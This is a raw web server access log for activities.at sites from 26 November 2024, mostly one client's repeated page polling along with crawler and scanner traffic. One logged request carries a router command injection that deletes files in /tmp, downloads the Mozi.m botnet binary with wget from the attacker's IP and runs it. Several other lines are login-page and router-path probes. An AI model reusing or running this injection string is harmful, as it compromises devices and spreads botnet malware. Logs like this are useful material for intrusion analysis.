178.115.42.220 - - [26/Nov/2024:13:06:15 +0100] "GET /entry.php?id=10271&&ser=622715 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622654" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:06:15 +0100] "GET /gui/javascript/form_form.js?1732622775 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:06:43 +0100] "GET /entry.php?id=10271&&ser=622742 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622682" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:06:43 +0100] "GET /gui/javascript/form_form.js?1732622803 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622742" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:07:15 +0100] "GET /entry.php?id=10271&&ser=622775 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:07:16 +0100] "GET /gui/javascript/form_form.js?1732622835 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622775" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
147.185.132.13 - - [26/Nov/2024:13:07:25 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.115.42.220 - - [26/Nov/2024:13:07:43 +0100] "GET /entry.php?id=10271&&ser=622803 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622742" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:07:43 +0100] "GET /gui/javascript/form_form.js?1732622863 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622803" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:08:16 +0100] "GET /entry.php?id=10271&&ser=622835 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622775" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:08:16 +0100] "GET /gui/javascript/form_form.js?1732622896 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622835" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [26/Nov/2024:13:08:43 +0100] "GET /ed-test.2web.at/stats/lang/awstats-it.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [26/Nov/2024:13:08:43 +0100] "GET /entry.php?id=10271&&ser=622863 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622803" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:08:43 +0100] "GET /gui/javascript/form_form.js?1732622923 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622863" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:09:00 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.115.42.220 - - [26/Nov/2024:13:09:16 +0100] "GET /entry.php?id=10271&&ser=622896 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622835" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:09:16 +0100] "GET /gui/javascript/form_form.js?1732622956 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:09:43 +0100] "GET /entry.php?id=10271&&ser=622923 HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10271&&ser=622863" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:09:44 +0100] "GET /gui/javascript/form_form.js?1732622984 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622923" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:10:16 +0100] "GET /entry.php?id=10271&&ser=622956 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:10:17 +0100] "GET /gui/javascript/form_form.js?1732623017 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622956" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:10:44 +0100] "GET /entry.php?id=10271&&ser=622983 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622923" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:10:44 +0100] "GET /gui/javascript/form_form.js?1732623044 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=622983" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:11:17 +0100] "GET /entry.php?id=10271&&ser=623017 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622956" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:11:17 +0100] "GET /gui/javascript/form_form.js?1732623077 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623017" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:11:19 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
178.115.42.220 - - [26/Nov/2024:13:11:44 +0100] "GET /entry.php?id=10271&&ser=623044 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=622983" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:11:44 +0100] "GET /gui/javascript/form_form.js?1732623104 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623044" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:12:17 +0100] "GET /entry.php?id=10271&&ser=623077 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623017" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:12:17 +0100] "GET /gui/javascript/form_form.js?1732623137 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623077" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.15.255.133 - - [26/Nov/2024:13:12:17 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.15.255.133:51505/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-"
156.59.198.135 - - [26/Nov/2024:13:12:43 +0100] "GET /renault.activities.at/htdocs/binaries/10019518.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [26/Nov/2024:13:12:44 +0100] "GET /entry.php?id=10271&&ser=623104 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623044" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:12:44 +0100] "GET /gui/javascript/form_form.js?1732623164 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623104" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:13:18 +0100] "GET /entry.php?id=10271&&ser=623137 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623077" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:13:18 +0100] "GET /gui/javascript/form_form.js?1732623198 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623137" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:13:45 +0100] "GET /entry.php?id=10271&&ser=623164 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623104" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:13:45 +0100] "GET /gui/javascript/form_form.js?1732623225 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623164" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:14:18 +0100] "GET /entry.php?id=10271&&ser=623198 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623137" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:14:18 +0100] "GET /gui/javascript/form_form.js?1732623258 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623198" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:14:45 +0100] "GET /entry.php?id=10271&&ser=623225 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623164" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:14:45 +0100] "GET /gui/javascript/form_form.js?1732623285 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623225" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:15:18 +0100] "GET /entry.php?id=10271&&ser=623258 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623198" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:15:18 +0100] "GET /gui/javascript/form_form.js?1732623318 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623258" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:15:30 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.115.42.220 - - [26/Nov/2024:13:15:45 +0100] "GET /entry.php?id=10271&&ser=623285 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623225" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:15:45 +0100] "GET /gui/javascript/form_form.js?1732623345 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623285" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:16:19 +0100] "GET /entry.php?id=10271&&ser=623318 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623258" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:16:19 +0100] "GET /gui/javascript/form_form.js?1732623379 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623318" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.135 - - [26/Nov/2024:13:16:43 +0100] "GET /renault.activities.at/htdocs/binaries/10225298.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [26/Nov/2024:13:16:45 +0100] "GET /entry.php?id=10271&&ser=623345 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623285" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:16:46 +0100] "GET /gui/javascript/form_form.js?1732623405 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623345" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:17:19 +0100] "GET /entry.php?id=10271&&ser=623379 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623318" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:17:19 +0100] "GET /gui/javascript/form_form.js?1732623439 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623379" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:17:46 +0100] "GET /entry.php?id=10271&&ser=623405 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623345" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:17:46 +0100] "GET /gui/javascript/form_form.js?1732623466 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623405" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
114.35.40.76 - - [26/Nov/2024:13:17:50 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
18.130.68.15 - - [26/Nov/2024:13:18:06 +0100] "GET /logon.htm HTTP/1.1" 404 283 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
178.115.42.220 - - [26/Nov/2024:13:18:19 +0100] "GET /entry.php?id=10271&&ser=623439 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623379" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:18:20 +0100] "GET /gui/javascript/form_form.js?1732623499 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623439" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:18:46 +0100] "GET /entry.php?id=10271&&ser=623466 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623405" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:18:46 +0100] "GET /gui/javascript/form_form.js?1732623526 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623466" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:19:20 +0100] "GET /entry.php?id=10271&&ser=623499 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623439" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:19:20 +0100] "GET /gui/javascript/form_form.js?1732623560 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623499" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:19:46 +0100] "GET /entry.php?id=10271&&ser=623526 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623466" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:19:46 +0100] "GET /gui/javascript/form_form.js?1732623586 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623526" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:20:20 +0100] "GET /entry.php?id=10271&&ser=623560 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623499" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:20:20 +0100] "GET /gui/javascript/form_form.js?1732623620 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623560" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
141.98.11.48 - - [26/Nov/2024:13:20:39 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "Hello"
156.59.198.135 - - [26/Nov/2024:13:20:43 +0100] "GET /renault.activities.at/htdocs/binaries/10319304.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [26/Nov/2024:13:20:47 +0100] "GET /entry.php?id=10271&&ser=623586 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623526" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:20:47 +0100] "GET /gui/javascript/form_form.js?1732623647 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623586" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:21:20 +0100] "GET /entry.php?id=10271&&ser=623620 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623560" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:21:21 +0100] "GET /gui/javascript/form_form.js?1732623681 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623620" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:21:42 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.115.42.220 - - [26/Nov/2024:13:21:47 +0100] "GET /entry.php?id=10271&&ser=623647 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623586" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:21:47 +0100] "GET /gui/javascript/form_form.js?1732623707 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:22:21 +0100] "GET /entry.php?id=10271&&ser=623681 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623620" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:22:21 +0100] "GET /gui/javascript/form_form.js?1732623741 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623681" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:22:47 +0100] "GET /entry.php?id=10271&&ser=623707 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:22:47 +0100] "GET /gui/javascript/form_form.js?1732623767 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623707" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:23:21 +0100] "GET /entry.php?id=10271&&ser=623741 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=623681" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:23:21 +0100] "GET /gui/javascript/form_form.js?1732623801 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623741" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:23:47 +0100] "GET /entry.php?id=10271&&ser=623767 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623707" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:23:48 +0100] "GET /gui/javascript/form_form.js?1732623827 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623767" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:23:52 +0100] "GET /login.jsp HTTP/1.1" 404 284 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
178.115.42.220 - - [26/Nov/2024:13:24:21 +0100] "GET /entry.php?id=10271&&ser=623801 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623741" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:24:22 +0100] "GET /gui/javascript/form_form.js?1732623862 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623801" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:24:48 +0100] "GET /entry.php?id=10271&&ser=623827 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623767" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:24:48 +0100] "GET /gui/javascript/form_form.js?1732623888 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623827" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:25:22 +0100] "GET /entry.php?id=10271&&ser=623862 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623801" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:25:22 +0100] "GET /gui/javascript/form_form.js?1732623922 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623862" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:25:48 +0100] "GET /entry.php?id=10271&&ser=623888 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623827" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:25:48 +0100] "GET /gui/javascript/form_form.js?1732623948 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623888" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:26:22 +0100] "GET /entry.php?id=10271&&ser=623922 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623862" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:26:22 +0100] "GET /gui/javascript/form_form.js?1732623982 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623922" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:26:48 +0100] "GET /entry.php?id=10271&&ser=623948 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623888" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:26:48 +0100] "GET /gui/javascript/form_form.js?1732624008 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623948" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:27:22 +0100] "GET /entry.php?id=10271&&ser=623982 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=623922" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [26/Nov/2024:13:27:23 +0100] "GET /gui/javascript/form_form.js?1732624043 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=623982" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
18.130.68.15 - - [26/Nov/2024:13:27:36 +0100] "\x16\x03\x01" 400 383 "-" "-"
